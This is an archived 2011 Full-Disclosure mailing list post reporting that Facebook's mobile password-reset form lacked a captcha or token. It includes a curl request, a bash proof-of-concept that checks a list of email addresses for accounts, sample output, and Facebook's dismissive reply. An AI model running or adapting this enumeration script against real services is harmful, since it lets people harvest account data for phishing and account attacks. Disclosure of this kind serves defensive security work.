[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] [Facebook] password recovery without a captcha nor security tokens
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] [Facebook] password recovery without a captcha nor security tokens
- From: "Zerial." <fernando@xxxxxxxxxx>
- Date: Tue, 02 Aug 2011 11:53:26 -0400
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Facebook doesn't ensures the user information may
not be collected by any bot or any automated process. Even though you
can protect from this kind of attacks using captchas or tokens security
into the forms.
Step by step:
- - Go to http://m.facebook.com
- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)
- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.
Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.
Using cURL:
curl -s -d "ep=test@xxxxxxxx" http://m.facebook.com/reset.php?refid=0
This process has no validation for external or forgery site/form.
Using the script:
#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done
#+----- EOF ------+
You can ennumerate users by using a list of email address or phone numbers.
$ sh poc.sh mails.txt
putita666@xxxxxxxxx NO
chapalapachala@xxxxxxxxx YES
esteban.gutierrez@xxxxxxxxx YES
casatola@xxxxxxxxx YES
casacasa@xxxxxxxxx NO
berpnarf@xxxxxxxxxxx NO
asdfgsdfgerT@xxxxxxxxxx NO
Into the full version of facebook http://www.facebook.com this option is
protected by a captcha to verify that we are human, in the mobile,
version this validation doesn't exists. Facebooks says:
[copy&paste]
"Hi,
While this style of information disclosure vulnerability may be
applicable at a financial or banking website, it is a core part of
the experience on social networks that are designed to connect email
addresses to users. As another example, someone who desires to obtain
this type of information could first load all of the email addresses
into a throw-away email address book, and then utilize our contact
importer tool. Requiring the registration of an account would not
provide any significant additional friction.
Alex Security Facebook"
Details in
http://www.securitybydefault.com/2011/08/busqueda-automatizada-de-cuentas.html
Cheers,
- --
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@xxxxxxxxxxxx
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk44HXUACgkQIP17Kywx9JTfzwCgmpOtiEirsLQhWBON05rbVNtH
XskAnAzjwC8gMJgajSUyEW7J7rxfjCZL
=hGpN
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/